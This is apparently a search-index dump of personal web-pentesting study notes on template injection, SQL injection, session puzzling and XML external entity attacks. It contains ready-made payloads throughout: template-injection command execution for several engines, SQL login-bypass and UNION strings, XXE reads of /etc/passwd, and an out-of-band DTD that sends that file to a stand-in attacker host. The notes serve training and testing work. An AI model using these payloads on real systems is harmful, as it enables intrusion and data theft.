                                            Many template engines expose a \"self\" or \"environment\" object of some kind, which acts like a namespace containing all objects, methods, and attributes that are supported by the template engine. If such an object exists, you can potentially use it to generate a list of objects that are in scope.

                                            It is important to note that websites will contain both built-in objects provided by the template and custom, site-specific objects that have been supplied by the web developer. You should pay particular attention to these non-standard objects

                                            • Create a custom attack
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#1-java-frameworks","title":"1. Java frameworks","text":"

                                            Many template engines expose a \"self\" or \"environment\" object. In Java-based templating languages, you can sometimes list all variables in the environment using the following injection:

                                            ${T(java.lang.System).getenv()}\n

                                            This can form the basis for creating a shortlist of potentially interesting objects and methods to investigate further. Additionally, for Burp Suite Professional users, the Intruder provides a built-in wordlist for brute-forcing variable names.

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#11-freemarker","title":"1.1. FreeMarker","text":"

                                            Basic payloads:

                                            {{7*7}}\n# return {{7*7}}\n\n${7*7}\n#return 49\n\n#{7*7}\n#return 49 -- (legacy)\n\n${7*'7'}\n#return nothing\n

                                            RCE in FreeMarker:

                                            <#assign ex = \"freemarker.template.utility.Execute\"?new()>${ ex(\"id\")}\n[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}\n${\"freemarker.template.utility.Execute\"?new()(\"id\")}\n\n${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/home/carlos/my_password.txt').toURL().openStream().readAllBytes()?join(\" \")}\n
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#12-velocity","title":"1.2. Velocity","text":"

                                            RCE in Velocity:

                                            $class.inspect(\"java.lang.Runtime\").type.getRuntime().exec(\"sleep 5\").waitFor()   \n\n[5 second time delay]   \n0\n
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#2-php-frameworks","title":"2. PHP frameworks","text":"","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#21-smarty","title":"2.1. Smarty","text":"

                                            RCE in Smarty

                                            {php}echo `id`;{/php}\n
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#3-python-frameworks","title":"3. Python frameworks","text":"","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#31-mako","title":"3.1. Mako","text":"

                                            RCE in Mako

                                            <%   import os   x=os.popen('id').read()   %>   ${x}\n
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#32-tornado","title":"3.2. Tornado","text":"

                                            Basic payloads:

                                            {{7*7}}\n# return 49\n\n${7*7}\n# return ${7*7}\n\n{{foobar}}\n#return Error\n\n{{7*'7'}}\n# return 7777777\n

                                            RCE in Tornado:

                                            {{os.system('whoami')}}\n\n\n{% import os %}{{ os.popen(\"whoami\").read() }}\n

                                            Useful tips to create SSTI exploit for Tornado:

                                            • Anything coming between\u00a0{{\u00a0and\u00a0}}\u00a0are evaluated and send back to the output.

                                            {{ 2*2 }}\u00a0-> 4

                                            • {% import module %} - Allows you to import python modules.

                                            {% import subprocess %}

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#4-ruby-frameworks","title":"4. Ruby frameworks","text":"","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#41-erb","title":"4.1. ERB","text":"

                                            Basic injection:

                                            <%= 7 * 7 %>\n

                                            Retrieve /etc/passwd

                                            <%= File.open('/etc/passwd').read %>\n

                                            List files and directories

                                            <%= Dir.entries('/') %>\n\n\n<%= File.open('/example/arbitrary-file').read %>\n

                                            Code execution

                                            <%= system('cat /etc/passwd') %>\n<%= `ls /` %>\n<%= IO.popen('ls /').readlines()  %>\n<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>\n<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>\n
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#tools","title":"Tools","text":"
                                            • Tplmap
                                            • Backslash Powered Scanner Burp Suite extension
                                            • Template expression test strings/payloads list
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#related-lab","title":"Related lab","text":"

                                            HackTheBox: Nunchunks: Express server with a nunjucks template engine.

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/session-puzzling-or-session-variable-overloading/","title":"Session Puzzling - Session Variable Overloading","text":"

                                            Owasp vuln description: https://owasp.org/www-community/vulnerabilities/Session_Variable_Overloading.

                                            Session Variable Overloading (also known as Session Puzzling, or Temporal Session Race Conditions) is an application level vulnerability which can enable an attacker to perform a variety of malicious actions. This vulnerability occurs when an application uses the same session variable for more than one purpose. An attacker can potentially access pages in an order unanticipated by the developers so that the session variable is set one one context and then used in another.

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/session-puzzling-or-session-variable-overloading/#demo","title":"Demo","text":"

                                            From 2011!!!!!!

                                            <iframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/-DackF8HsIE\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>\n
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/session-puzzling-or-session-variable-overloading/#tools-and-payloads","title":"Tools and payloads","text":"
                                            • See updated chart: Attacks and tools for web pentesting.
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/","title":"SQL injection","text":"

                                            SQL stands for Structure Query Language. SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database: to view data, to retrieve it, to modify it, to delete it, to compromise the infrastructure with what is known for instance as a denial of service attack.

                                            A detailed SQLi Cheat sheet for manual attack.

                                            OWASP

                                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.5. Testing for SQL Injection

                                            ID Link to Hackinglife Link to OWASP Description 7.5 WSTG-INPV-05 Testing for SQL Injection - Identify SQL injection points. - Assess the severity of the injection and the level of access that can be achieved through it. Sources for these notes
                                            • My Ine: eWPTv2.
                                            • Hacktricks.
                                            • OWASP: WSTG Testing for SQL injection.
                                            • Notes during the Cibersecurity Bootcamp at The Bridge.
                                            • Experience pentesting applications.
                                            Languages and dictionaries Server Dictionary MySQL MySQL payloads. MSSQL MSSQL payloads. PostgreSQL PostgreSQL payloads. Oracle Oracle SQL payloads. SQLite SQLite payloads. Cassandra Cassandra payloads. Attack-based dictionaries
                                            • Generic SQL Injection Payloads
                                            • Generic Error Based Payloads.
                                            • Generic Union Select Payloads.
                                            • SQL time based payloads .
                                            • SQL Injection Auth Bypass Payloads
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#how-does-sql-injection-work","title":"How does SQL injection work?","text":"

                                            1. Retrieving hidden data

                                            Examples at a shopping application

                                            Request URL SQL Query Explained http://insecure-website.com/products?category=Gifts SELECT * FROM products WHERE category='Gift' AND release=1 Restriction \"released\" is being used to hide products that are not released. Unreleased products will be presumably released=0 http://insecure-website.com/products?category=Gifts'-- SELECT * FROM products WHERE category='Gift'--' AND released=1 Explained: Double dash sequence -- is a comment indicator in SQL which means that the rest of the query is interpretated as a comment. The application will display all the products in a category, being released or not. https://insecure-website.com/products?category=Gifts'+OR+1=1-- SELECT * FROM products WHERE category='Gifts' OR 1=1--' AND released=1 This will return all items where category is Gifts, or 1=1. Since 1=1 is always true, the query will return all items.

                                            2. Subverting application logic

                                            Request URL SQL Query Explained Login SELECT * FROM users WHERE username=\"admin\" AND password=\"lalalala\" Login process, probably with a POST method Login: Adding admin'-- in the username and '' in the password field SELECT * FROM users where username=\"admin'-- AND password='' This query returns the user whose name is admin and succesfully logs the attacker as that user.","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#clasification","title":"Clasification","text":"

                                            SQLi (for SQL injection) typically falls under three categories.

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#1-in-band-sqli-or-classic-sql-injection","title":"1. In-band SQLi / or Classic SQL injection","text":"

                                            In-band SQL injection is the most common type of SQL injection attack. It occurs when an attacker uses the same communication channel to send the attack and receive the results. In other words, the attacker injects malicious SQL code into the web application and receives the results of the attack through the same channel used to submit the code. In-band SQL injection attacks are dangerous because they can be used to steal sensitive information, modify or delete data, or take over the entire web application or even the entire server. Attacks are sent from the same channel in which results are collected.

                                            In-band SQL injection can be further divided into two subtypes/exploitation techniques:

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#11-error-based-sqli","title":"1.1. Error-based SQLi","text":"

                                            Error-based SQL injection: In error-based SQL injection, the attacker injects SQL code that causes the web application to generate an error message. The error message can contain valuable information about the database schema or the contents of the database itself, which the attacker can use to further exploit the vulnerability.

                                            The attacker performs actions that cause the database to produce error messages. The attacker can potentially use the data provided by these error messages to gather information about the structure of the database.

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#12-union-based-sqli","title":"1.2. Union-based SQLi","text":"

                                            The UNION operator is used in SQL to combine the results of two or more SELECT statements into a single result set. Therefore, it requires that the number of columns and their data types match in the SELECT statements being combined.

                                            Union-based SQL injection: In union-based SQL injection, the attacker injects additional SELECT statements through the vulnerable input. By manipulating the injected SQL code, the attacker can extract data from the database that they are not authorized to access.

                                            Here's an example to illustrate the concept. Consider the following vulnerable code snippet:

                                            SELECT id, name FROM users WHERE id = '<user_input>'\n

                                            An attacker can exploit this vulnerability by injecting a UNION-based attack payload into the parameter. They could inject a statement like:

                                            ' UNION SELECT credit_card_number, 'hack' FROM credit_cards --\n

                                            The injected payload modifies the original query to retrieve the credit card numbers along with a custom value ('hack') from the credit_cards table. The double dash at the end is used to comment out the remaining part of the original query.

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#2-inferential-blind-sqli","title":"2. Inferential (Blind) SQLi","text":"

                                            Blind SQL Injection is a type of SQL Injection attack where an attacker can exploit a vulnerability in a web application that does not directly reveal information about the database or the results of the injected SQL query. In this type of attack, the attacker injects malicious SQL code into the application's input field, but the application does not return any useful information or error messages to the attacker in the response. The attacker typically uses various techniques to infer information about the database, such as time delays or Boolean logic. The attacker may inject SQL code that causes the application to delay for a specified amount of time, depending on the result of a query.

                                            Blind SQL injection can be further divided into two subtypes/exploitation techniques:

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#21-boolean-based-content-based-blind-sqli","title":"2.1. Boolean-based (content-based) Blind SQLi","text":"

                                            Boolean-based SQL Injection: In this type of attack, the attacker exploits the application's response to boolean conditions to infer information about the database. The attacker sends a malicious SQL query to the application and evaluates the response based on whether the query executed successfully or failed.

                                            Inferential SQL injection technique that relies on sending a SQL query to the database which forces the application to return a different result depending on whether the query returns a TRUE or FALSE result.

                                            See this example:

                                            ' OR LENGTH(database()) > 5--\n

                                            This payload test whether the length of the database name is greater than 5 characters. Afterwards, you can start testing each character and, therefore, retrieve the name of the database.

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#22-time-based-blind-sqli","title":"2.2. Time-Based Blind SQLi","text":"

                                            Time-based Blind Injection: In this type of attack, the attacker exploits the application's response time to infer information about the database. The attacker sends a malicious SQL query to the application and measures the time it takes for the application to respond.

                                            If you don't get a TRUE or FALSE response, sometimes you may infer if it is TRUE or FALSE based on time of response. Time-based SQL injection is a inferential SQL injection technique that relies on sending a SQL query to the database, which forces the database to wait for a specified amount of time (in seconds) before responding. The response time will indicate to the attacker whether the result of the query is TRUE or FALSE.

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#3-out-of-band-sqli","title":"3. Out-of-Band SQLi","text":"

                                            Out-of-band SQL Injection is the least common type of SQL injection attack. It involves an attacker exploiting a vulnerability in a web application to extract data from a database using a different channel, other than the web application itself. Unlike in-band SQL Injection, where the attacker can observe the result of the injected SQL query in the application's response, out-of-band SQL Injection does not require the attacker to receive any response from the application. The attacker can use various techniques to extract data from the database, such as sending HTTP requests to an external server controlled by the attacker or using DNS queries to extract data.

                                            It's used when an attacker is unabled to use the same channel to launch the attack and gather results. Out-of-band SQLi techniques would rely on the database server's ability to make DNS or HTTP request to deliver data to an attacker.

                                            Such is the case of Microsoft SQL Server's xp_dirtree command, which can be used to make DNS request to a server that an attacker controls, as well as Oracle Database's UTL_HTTP package, which can be used to send HTTP requests from SQL and PL/SQL ti a server that an attacker controls.

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#databases","title":"Databases","text":"

                                            In computing, a database is typically managed by a Database Management System (DBMS) that provides a set of tools and interfaces to interact with the data. DBMS stands for \"Database Management System\". It is a software system that enables users to create, store, organize, manage, and retrieve data from a database.

                                            DBMS provides an interface between the user and the database, allowing users to interact with the database without having to understand the underlying technical details of data storage, retrieval, and management. DBMS provides various functionalities such as creating, deleting, modifying, and querying the data stored in the database. It also manages security, concurrency control, backup, recovery, and other important aspects of data management.

                                            Types of databases:

                                            • Relational Databases - A database that organizes data into one or more tables or relations, where each table represents an entity or a concept, and the columns of the table represent the attributes of that entity or concept. SQL databases are relational databases that store data in tables with rows and columns, and use SQL (Structured Query Language) as their standard language for managing data. They enforce strict data integrity rules and support transactions to ensure data consistency. SQL databases are widely used in applications that require complex data queries and the ability to handle large amounts of structured data. Some examples of SQL databases include MySQL, Oracle, Microsoft SQL Server, and PostgreSQL.
                                            • NoSQL Databases - A type of database that does not use the traditional tabular relations used in relational databases. Instead, NoSQL databases use a variety of data models to store and access data.
                                            • Object-oriented Databases - A database that stores data as objects rather than in tables, allowing for more complex data structures and relationships.

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#1-rdbms-relational-database-management-system","title":"1. RDBMS - Relational Database Management System","text":"

                                            RDBMS stands for Relational Database Management System. It is a software system that enables the creation, management, and administration of relational databases. RDBMSs are designed to store, organize, and retrieve large amounts of structured data efficiently. RDBMSs provide a set of features and functionalities that allow users to create database schemas, define relationships between tables, insert, update, and retrieve data, and perform complex queries using SQL. They also handle aspects like data security, transaction Management, and concurrency control to ensure data integrity and consistency.

                                            The following are examples of popular DBMS (Database Management Systems):

                                            • MySQL - A free, open-source relational database management system that is widely used for web applications.
                                            • PostgreSQL - Another popular open-source relational database management system that is known for its advanced features and reliability.
                                            • Oracle Database - A commercial relational database management system developed by Oracle Corporation that is widely used in enterprise applications.
                                            • Microsoft SQL Server - A commercial relational database Management system developed.

                                            How relational databases work:

                                            • Tables: The basic building blocks of a relational database are tables, also known as relations. A table consists of rows (also called records or tuples) and columns (also known as attributes). Each row represents a unique record or instance of an entity, and each column represents a specific attribute or characteristic of that entity.

                                            • Keys: Keys are used to uniquely identify records within a table and establish relationships between tables. The primary key is a column or set of columns that uniquely identifies each row in a table. It ensures the integrity and uniqueness of the data. Foreign keys are columns in one table that reference the primary key of another table, establishing relationships between the tables.

                                            • Relationships: Relationships define how tables are connected or associated with each other. Common types of relationships include one-to-one, one-to-many, and many-to-many. These relationships are established using primary and foreign keys, allowing data to be linked and retrieved across multiple tables.

                                            • Structured Query Language (SQL): Relational databases are typically accessed and manipulated using the Structured Query Language (SQL). SQL provides a standardized language for querying, inserting, updating, and deleting data from relational databases. It allows users to perform operations such as retrieving specific records, filtering data based on conditions, joining tables to combine data, and aggregating data using functions.

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#2-nosql","title":"2. NoSQL","text":"

                                            [NoSQL] (Not Only SQL) databases are a type of database management system that differ from traditional relational databases (RDBMS) in terms of data model, scalability, and flexibility. NoSQL databases are designed to handle large volumes of unstructured, semi-structured, and rapidly changing data. NoSQL databases are commonly used in modern web applications, big data analytics, real-time streaming, content management systems, and other scenarios where the flexibility, scalability, and performance advantages they offer are valuable.

                                            There are several popular NoSQL databases available, each with its own strengths and use cases. Here are some examples of well-known NoSQL databases:

                                            • MongoDB: MongoDB is a document database that stores data in flexible, JSON-like documents. It provides scalability, high performance, and rich query capabilities. MongoDB is widely used in web applications, content management systems, and real-time analytics. It uses MQL (MongoDB Query Language).
                                            • Redis: Redis is an in-memory data store that supports various data structures, including strings, hashes, lists, sets, and sorted sets. It is known for its exceptional performance and low latency. Redis is often used for caching, real-time analytics, session management, and pub/sub messaging.
                                            • Amazon DynamoDB.
                                            • CouchBase Server.
                                            • Apache Cassandra: Distributed columnar database designed to handle large amounts of data across multiple commodity servers. It offers hight availability, fault tolerance, and linear scalability,
                                            • Apache HBase.
                                            • Riak.
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#how-web-applications-utilize-sql-queries","title":"How web applications utilize SQL queries","text":"

                                            The following code contains a PHP example of a connection to a MySQL database and the execution of a SQL query.

                                            $dbhostname='1.2.3.4';\n$dbuser='username';\n$dbpassword='password';\n$dbname='database';\n\n$connection = mysqli_connect($dbhostname, $dbuser, $dbpassword, $dbname);\n$query = \"SELECT Name, Description FROM Products WHERE ID='3' UNION SELECT Username, Password FROM Accounts;\";\n\n$results = mysqli_query($connection, $query);\ndisplay_results($results);\n

                                            Most of the times queries are not static; they are indeed dynamically built by using user' inputs. Here you can find a vulnerable dynamic query example:

                                            $id = $_GET['id'];\n\n$connection = mysqli_connect($dbhostname, $dbuser, $dbpassword, $dbname);\n$query = \"SELECT Name, Description FROM Products WHERE ID='$id';\";\n\n$results = mysqli_query($connection, $query);\ndisplay_results($results);\n

                                            If an attacker crafts an $id value which can actually change the query, like:

                                            ' OR 'a'='a\n

                                            Then the query becomes:

                                            SELECT Name, Description FROM Products WHERE ID='' OR 'a'='a';\n

                                            This tells the database to select the items by checking two conditions:

                                            • The id must be empty (id='') OR an always true condition ('a'='a\u2019)
                                            • While the first condition is not met, the SQL engine will consider the second condition of the OR. This second condition is crafted as an always true condition.

                                            In other words, this tells the database to select all the items in the Products table.

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#common-injectable-fields","title":"Common injectable fields","text":"

                                            SQL injection vulnerabilities can exist in various input fields within an application.

                                            • Login forms: The username and password fields in a login form are common targets for SQL injection attacks.
                                            • Search boxes: Input fields used for searching within an application are potential targets for SQL injection. If the search query is directly incorporated into a SQL statement without proper validation, an attacker can inject malicious SQL code to manipulate the query and potentially access unauthorized data.
                                            • URL parameters: Web applications often use URL parameters to pass data between pages. If the application uses these parameters directly in constructing SQL queries without proper validation and sanitization, it can be susceptible to SQL injection attacks.
                                            • Form fields: Any input fields in forms, such as registration forms, contact forms, or comment fields, can be vulnerable to SQL injection if the input is not properly validated and sanitized before being used in SQL queries.
                                            • Hidden fields: Hidden fields in HTML forms can also be susceptible to SQL injection attacks if the data from these fields is directly incorporated into SQL queries without proper validation.
                                            • Cookies: In some cases, cookies containing user data or session information may be used in SQL queries. If the application does not validate or sanitize the cookie data properly, it can lead to SQL injection vulnerabilities.
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#tools-and-payloads","title":"Tools and payloads","text":"
                                            • See updated chart: Attacks and tools for web pentesting.
                                            • Detailed Cheat sheet with manual union and blind attacks can be found in the SQLi Cheat sheet for manual attack.

                                            • https://portswigger.net/web-security/sql-injection/cheat-sheet.

                                            • https://github.com/payloadbox/sql-injection-payload-list.
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/xml-external-entity-xee/","title":"XXE - XEE XML External Entity attacks","text":"Sources
                                            • HackTricks.
                                            • Portsqigger.
                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#basic-concepts","title":"Basic concepts","text":"","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#what-it-xml","title":"What it XML?","text":"

                                            XML stands for \"extensible markup language\". XML is a language designed for storing and transporting data. Like HTML, XML uses a tree-like structure of tags and data. Unlike HTML, XML does not use predefined tags, and so tags can be given names that describe the data.

                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#what-are-xml-entities","title":"What are XML entities?","text":"

                                            XML entities are a way of representing an item of data within an XML document, instead of using the data itself. Various entities are built in to the specification of the XML language. For example, the entities < and > represent the characters < and >. These are metacharacters used to denote XML tags, and so must generally be represented using their entities when they appear within data.

                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#what-are-xml-elements","title":"What are XML elements?","text":"

                                            Element type declarations set the rules for the type and number of elements that may appear in an XML document, what elements may appear inside each other, and what order they must appear in. For example:

                                            <!ELEMENT root ANY> Means that any object could be inside the parent <root></root>\n\n<!ELEMENT root EMPTY> Means that it should be empty <stockCheck></stockCheck>\n\n<!ELEMENT root (name,password)> Declares that <root> can have the children <name> and <password>\n
                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#what-is-document-type-definition","title":"What is document type definition?","text":"

                                            The XML document type definition (DTD) contains declarations that can define the structure of an XML document, the types of data values it can contain, and other items. The DTD is declared within the optional DOCTYPE element at the start of the XML document. The DTD can be fully self-contained within the document itself (known as an \"internal DTD\") or can be loaded from elsewhere (known as an \"external DTD\") or can be hybrid of the two.

                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#how-xml-custom-entities-work","title":"How XML custom entities work?","text":"

                                            XML allows custom entities to be defined within the DTD. For example:

                                            <!DOCTYPE foo [ <!ENTITY myentity \"my entity value\" > ]>\n

                                            This definition means that any usage of the entity reference &myentity; within the XML document will be replaced with the defined value: \"my entity value\".

                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#what-are-xml-external-entities","title":"What are XML external entities?","text":"

                                            XML external entities are a type of custom entity whose definition is located outside of the DTD where they are declared. The declaration of an external entity uses the SYSTEM keyword and must specify a URL from which the value of the entity should be loaded. For example:

                                            <!DOCTYPE foo [ <!ENTITY ext SYSTEM \"http://normal-website.com\" > ]>\n

                                            The URL can use the file:// protocol, and so external entities can be loaded from file. For example:

                                            <!DOCTYPE nameThatYouWant [ <!ENTITY nameofEntity SYSTEM \"file:///path/to/file\" > ]>\n<root>\n    <name>&nameofEntity;</name>\n    <password>1</password>\n</root>\n\n# nameThatyouWant: string with the name that you want\n# nameofEntity: we will call the entity using this name. It\n# <!ENTITY: There might be more than one entity defined\n# SYSTEM: allow us to call the entity\n# file:// -> To call an internal value. But instead of file we can call:\n    # http://\n    # ftp://\n    # ssh://\n    # php://\n# &nameofEntity;  -> This is how you request the object\n
                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#classic-xml-external-entity","title":"Classic XML External Entity","text":"
                                            # Classic XXE\n<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\" > ]>\n<name>&nameofEntity;</name>\n
                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#base-encoded-xml-external-entity","title":"Base-encoded XML External Entity","text":"
                                            # Base encoded XXE\n<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"php://filter/convert.base64-encode/resource=file:///etc/passwd\" > ]>\n<name>&nameofEntity;</name>\n
                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#blind-xml-external-entity-out-of-band","title":"Blind XML External Entity - Out of Band","text":"
                                            # Blind XXE 1\n<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM \"file:///etc/passwd\"> %xxe; ]>\n
                                            # Blind XXE 2\n<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM \"http://malicious.com/exploit\"> %xxe; ]>\n\n    # http://malicious.com/exploit will contain another entity such as \n<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM \"file:///etc/passwd\"> %xxe; ]>\n
                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#but-why-external-entities-are-accepted","title":"But why external entities are accepted","text":"

                                            This is a snipped of a PHP code that accept extenal DTDs

                                            <?php\n\nlibxml_disable_entity_loader (false);\n// libxml_disable_entity_loader (true);\n\n$xmlfile = file_get_contents('php://input');\n$dom = new DOMDocument();\n$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);\n$info = simplexml_import_dom($dom);\n$name = $info->name;\n$password = $info->password;\n\necho \"Sorrym this $name is not available\";\n?>\n

                                            Allowing external DTDs is done in line:

                                            libxml_disable_entity_loader (false);\n
                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#main-attacks","title":"Main attacks","text":"","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#new-entity-test","title":"New Entity test","text":"

                                            In this attack I'm going to test if a simple new ENTITY declaration is working:

                                            <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE foo [<!ENTITY toreplace \"3\"> ]>\n<stockCheck>\n    <productId>&toreplace;</productId>\n    <storeId>1</storeId>\n</stockCheck>\n
                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#1-retrieve-files","title":"1. Retrieve files","text":"

                                            Modify the submitted XML in two ways:

                                            • Introduce (or edit) a\u00a0DOCTYPE\u00a0element that defines an external entity containing the path to the file.
                                            • Edit a data value in the XML that is returned in the application's response, to make use of the defined external entity.

                                            In a windows system, we may use c:/windows/system32/drivers/etc/hosts:

                                            POST /process.php HTTP/1.1\nHost: 10.129.95.192\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: text/xml\nContent-Length: 192\nOrigin: http://10.129.95.192\nConnection: close\nReferer: http://10.129.95.192/services.php\nCookie: PHPSESSID=1gjqt353d2lm5222nl3ufqru10\n\n<?xml version = \"1.0\"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/system32/drivers/etc/hosts'>]>\n<order>\n    <quantity>2</quantity>\n    <item>&test;</item>\n    <address>1</address>\n</order>\n

                                            In a Linux server go for

                                            # example 1\n<?xml version = \"1.0\"?><!DOCTYPE foo [<!ENTITY example1 SYSTEM \"/etc/passwd\"> ]>\n<order>\n    <quantity>2</quantity>\n    <item>&example1;</item>\n    <address>1</address>\n</order>\n\n\n# example 2\n<?xml version = \"1.0\"?><!DOCTYPE foo [ <!ENTITY example2 SYSTEM \"file:///etc/passwd\" > ]>\n<order>\n    <quantity>2</quantity>\n    <item>&example2;</item>\n    <address>1</address>\n</order>\n

                                            Encoding techniques

                                            # Base encoded XXE\n<?xml version = \"1.0\"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"php://filter/convert.base64-encode/resource=file:///etc/passwd\" > ]>\n<name>&nameofEntity;</name>\n

                                            This filter return the file base64-encoded to avoid data loss and truncate.

                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#2-chaining-xxe-to-ssrf-attacks","title":"2. Chaining XXE to SSRF attacks","text":"

                                            To exploit an XXE vulnerability to perform an SSRF attack, you need to define an external XML entity using the URL that you want to target, and use the defined entity within a data value.

                                            <?xml version = \"1.0\"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"http://internal.vulnerable-website.com/\"> ]>\n

                                            You would then make use of the defined entity in a data value within the XML.

                                            See this lab with an example of exploitation

                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#3-blind-xxe-vulnerabilities","title":"3. Blind XXE vulnerabilities","text":"

                                            Sometimes the application does not return the values of any defined external entities in its responses, and so direct retrieval of server-side files is not possible.

                                            Blind XXE requires the use of out-of-band techniques, and call the parameter (for example xxe) just after the ENTITY definition. Therefore, XML parameter entities are a special kind of XML entity which can only be referenced elsewhere within the DTD.

                                            <?xml version = \"1.0\"?><!DOCTYPE foo [ <!ENTITY % xxe SYSTEM \"http://internal.vulnerable-website.com/\"> %xxe;]>\n

                                            You don't need to make use of the defined entity in a data value within the XML as the %xxe; is already calling the entity.

                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#4-blind-xxe-with-data-exfiltration-out-of-band-blind-xxe-with-oob-data-exfiltration","title":"4. Blind XXE with data exfiltration out-of-band (Blind XXE with OOB data exfiltration)","text":"

                                            1. Create a malicious.dtd file:

                                            <!ENTITY % file SYSTEM \"file:///etc/passwd\"> \n<!ENTITY % eval \"<!ENTITY &#x25; exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>\"> %eval; %exfiltrate;\n
                                            Basically, malicious.dtd retrieves /etc/passwd from the instance in which is executed.

                                            2. Serve our malicious.dtd from http://atacker.com/malicious.dtd.

                                            3. Submit a payload to the victim via XXE (blind) with a xml parameter entity.

                                            <!DOCTYPE foo [<!ENTITY % xxe SYSTEM \"http://attacker.com/malicious.dtd\"> %xxe;]>\n

                                            This will cause the XML parser to fetch the external DTD from the attacker's server and interpret it inline.

                                            ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#5-blind-xxe-to-retrieve-data-via-error-messages","title":"5. Blind XXE to retrieve data via error messages","text":"

                                            An alternative approach to exploiting blind XXE is to trigger an XML parsing error where the error message contains the sensitive data that you wish to retrieve.

                                            • Trigger an XML parsing error message containing the contents of the\u00a0/etc/passwd\u00a0file using a malicious external DTD as follows:
                                            <!ENTITY % file SYSTEM \"file:///etc/passwd\"> <!ENTITY % eval \"<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>\"> %eval; %error;\n

                                            Invoking the malicious external DTD may result in an error message like the following:

                                            java.io.FileNotFoundException: /nonexistent/root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin\n
